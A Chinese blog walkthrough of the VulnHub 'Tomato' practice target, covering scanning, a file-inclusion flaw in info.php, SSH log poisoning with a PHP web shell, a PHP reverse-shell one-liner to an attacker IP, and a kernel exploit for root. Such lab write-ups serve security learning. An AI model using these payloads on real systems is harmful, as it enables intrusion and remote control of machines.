tomato靶机提权

最新推荐文章于 2024-05-12 12:36:27 发布
最新推荐文章于 2024-05-12 12:36:27 发布
阅读量542 收藏 3
点赞数
分类专栏: kali 渗透 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FJawen/article/details/117294728
版权

tomato靶机提权

信息收集

1、 使用arp-scan -l 扫描本地局域网存活主机:
在这里插入图片描述

2、 Nmap扫描开放端口以及相关信息:
在这里插入图片描述

3、 访问http服务端口查看页面信息:
在这里插入图片描述

4、 没有相关可利用信息,继续访问8888端口http服务:
在这里插入图片描述

5、 利用dirb对站点目录进行爆破:
在这里插入图片描述

6、 发现其他站点并进行访问
在这里插入图片描述

7、 根据修改时间发现info.php文件最新更新,访问并查看源码:
在这里插入图片描述

发现文件包含,尝试包含文件…/…/…/…/…/…/etc/passwd:
在这里插入图片描述

利用漏洞

已知info.php文件存在文件包含漏洞,以及开放ssh端口,尝试包含ssh认证日志文件/var/log/auth.log,并利用ssh认证用户名实现命令注入:
1、 尝试用tomato作为用户名进行失败登录,观察相关日志记录:
在这里插入图片描述

2、 利用<?php system($_GET[‘cmd’]);?>作为用户名进行php代码注入:
在这里插入图片描述

3、 验证php是否注入成功
访问?image=…/…/…/…/…/…/var/log/auth.log&cmd=ls并查看网页源代码:
在这里插入图片描述

4、 尝试get shall,利用php反弹shell,kali攻击机利用nc监听4444端口:
在这里插入图片描述

PHP反弹shell代码如下:
php -r ‘$sock=fsockopen(“192.168.1.53”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’
进行url编码后得到:
php±r+%27%24sock%3dfsockopen(%22192.168.1. 53%22%2c4444)%3bexec(%22%2fbin%2fsh±i+%3c%263+%3e%263+2%3e%263%22)%3b%27
在这里插入图片描述

权限提升

1、 利用python打开终端查看内核版本
在这里插入图片描述

2、 下载对应版本的exp
在这里插入图片描述

git clone https://github.com/kkamagui/linux-kernel-exploits.git
然后运行compile.sh 编译c文件
在这里插入图片描述

3、 上传至目标主机
python -m SimpleHTTPServer 8000
在这里插入图片描述

上传文件至目标机
在这里插入图片描述
在这里插入图片描述

上传成功
在这里插入图片描述
在这里插入图片描述

提权成功

FitnessJawen
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【愚公系列】2023年06月 网络安全高级班 101.CTF黑客比赛(Tomato靶机
时光隧道
06-05 4308
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞。Tomatosecurity官网提供了Tomato靶机的下载和使用说明。
Vulnhub靶机TOMATO_ 1
LainWith的博客
08-29 1029
系列Tomato(此系列共1台)发布日期:2020年09月14日注释:使用vmwar workstation运行虚拟机难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径爬取文件包含写入日志内核漏洞枚举本地提权。...
2024年最新靶机实战系列之Tomato靶机,2024年最新神级Golang进阶笔记
最新发布
2401_84919661的博客
05-12 249
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。(都打包成一块的了,不能一一展开,总共300多集)同样的在日志文件中确实发现了存在相关记录。1.6 反弹shell。
VulnHub渗透测试实战靶场 - Tomato:1
LYJ20010728的博客
08-19 1786
VulnHub渗透测试实战靶场 - Tomato:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.137 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-100
【打靶记录】VulnHub-Tomato靶机渗透wp
qq_39972370的博客
11-17 1459
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞。
Vulnhub-Tomato靶机实战
御七彩虹猫
05-06 952
Vulnhub-Tomato靶机实战
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
Tomato RAF+ 固件合集
07-06
Tomato RAF+ 可以让普通路由器摇身一变,成为拥有不逊色于商用路由器的功能的路由器, Tomato RAF+ 绝对是你遇到的国内功能最强的Tomato 固件,它是一款适合家用和商用的免费第三方路由器系统。 刷了 Tomato RAF+ 的...
tomato固件修改工具
06-01
总之,"Tomato固件修改工具"是网络管理员和爱好者的得力助手,它赋予了用户更大的控制权,使他们能根据自己的需求定制路由器的固件,从而提高网络效率和用户体验。不过,这种高级操作需要一定的技术知识,新手需谨慎...
tomato打印服务共享教程
06-01
tomato打印服务共享教程 本教程旨在指导用户如何配置tomato打印服务共享,实现打印机的网络共享。整个过程可以分为五个步骤:配置服务器、启动打印服务功能;有线接入主路由配置;无线连接主路由配置;电脑添加网络...
tomato固件
01-01
tomato-K26-1.28.20141211MIPSR2-Arctic-MultiWAN-Micro-NoUSB 亲测可用
Tomato 1.28固件
11-15
Tomato 1.28官方原生固件,单wan口的哦
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1436
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1511
小白学渗透
vulnhub靶场-tomato
qq_42947816的博客
03-07 7508
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
靶机实战系列之Tomato靶机
Javachichi的博客
02-07 1045
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
tomato靶机打靶过程及思路
qq_52610024的博客
05-30 418
5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成。3.发现info.php提示文件包含,读取到/var/log/auth.log,可以用ssh登录传入一句话木马,2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径。用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息。-i&32>&3);1.常规端口及服务发现。...
tomato靶机渗透测试
weixin_49340699的博客
07-28 1237
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
Vulnhub靶机tomato渗透
xingjinhao123的博客
02-26 1165
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/tomato-1,557/ 该靶机目标是获取root目录下的flag,难度是中等到困难 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.86 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取IP地址 扫描端口及其服务 扫描目录 开始访问 80端口首页是一张图片,源代码也没有获取有用的信息 server-status是一个目录 antibo
d茅tection tomato
07-30
侦测番茄的方法有很多。首先,可以通过目视观察来检测番茄。我们可以观察番茄的形状、颜色和大小来确定它是否成熟或有任何瑕疵。这种方法虽然简单,但需要经验和专业知识。 其次,可以使用光谱分析技术来探测番茄。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值